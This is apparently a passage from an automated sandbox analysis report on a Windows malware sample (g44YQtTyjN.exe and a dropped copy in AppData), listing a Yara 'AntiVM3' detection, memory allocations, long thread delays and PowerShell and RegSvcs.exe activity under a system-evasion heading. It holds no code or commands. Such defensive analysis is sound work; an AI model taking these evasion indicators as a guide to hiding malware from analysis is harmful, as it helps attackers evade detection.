                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: g44YQtTyjN.exe PID: 3036, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ECmmsbHOaKPh.exe PID: 8812, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeMemory allocated: 2280000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeMemory allocated: 2460000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeMemory allocated: 4460000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeMemory allocated: 8670000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeMemory allocated: 68D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeMemory allocated: 9670000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeMemory allocated: A670000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeMemory allocated: B0A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeMemory allocated: C0A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeMemory allocated: FE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeMemory allocated: 4B10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeMemory allocated: 8720000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeMemory allocated: 70C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeMemory allocated: 9720000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeMemory allocated: A720000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeMemory allocated: B0E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeMemory allocated: C0E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeMemory allocated: D0E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 599862Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 599734Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 599625Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 599515Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 599406Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 599297Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 599187Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 599078Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 598969Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 598831Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 598703Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 598590Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 598483Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 598246Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 598140Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 598016Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 597797Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 596922Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 596562Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 596453Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 596344Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 596234Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 596124Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 596013Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 595906Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 595688Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 595575Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 595427Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 595275Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 595109Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594874Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594763Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594655Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594437Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594328Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594219Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594109Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 594000Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 593890Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeThread delayed: delay time: 593781Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 599343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 599125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 599015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 598907Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 598782Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 598657Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 598532Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 598407Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 598282Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 598094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 597985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 597813Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 597552Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 597355Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 597211Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 597110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 596985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 596860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 596735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 596610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 596485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 595360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 595110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 594985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 594860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 594735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 594610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 594485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 594360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 594235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 594110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 593985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeThread delayed: delay time: 593860Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeWindow / User API: threadDelayed 1880Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeWindow / User API: threadDelayed 7949Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6346Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3344Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7581Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 427Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: foregroundWindowGot 1778Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeWindow / User API: threadDelayed 2150Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeWindow / User API: threadDelayed 7665Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: foregroundWindowGot 1775
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -599862s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -599734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -599625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -599515s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -599406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -599297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -599187s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -599078s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -598969s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -598831s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -598703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -598590s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -598483s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -598246s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -598140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -598016s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -597906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -597797s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -597687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -597578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -597468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -597359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -597250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -597140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -597031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -596922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -596812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -596703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -596562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -596453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -596344s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -596234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -596124s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -596013s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -595906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -595688s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -595575s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -595427s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -595275s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -595109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -594984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -594874s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -594763s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -594655s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -594547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -594437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -594328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -594219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -594109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -594000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -593890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284Thread sleep time: -593781s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6648Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8752Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -599891s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -599781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -599672s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -599562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -599453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -599343s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -599234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -599125s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -599015s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -598907s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -598782s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -598657s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -598532s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -598407s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -598282s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -598094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -597985s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -597813s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -597687s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -597552s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -597355s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -597211s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -597110s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -596985s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -596860s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -596735s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -596610s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -596485s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -596360s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -596235s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -596110s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -595985s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -595860s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -595735s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -595610s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -595485s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -595360s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -595235s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -595110s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -594985s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000Thread sleep time: -594860s >= -30000sJump to behavior
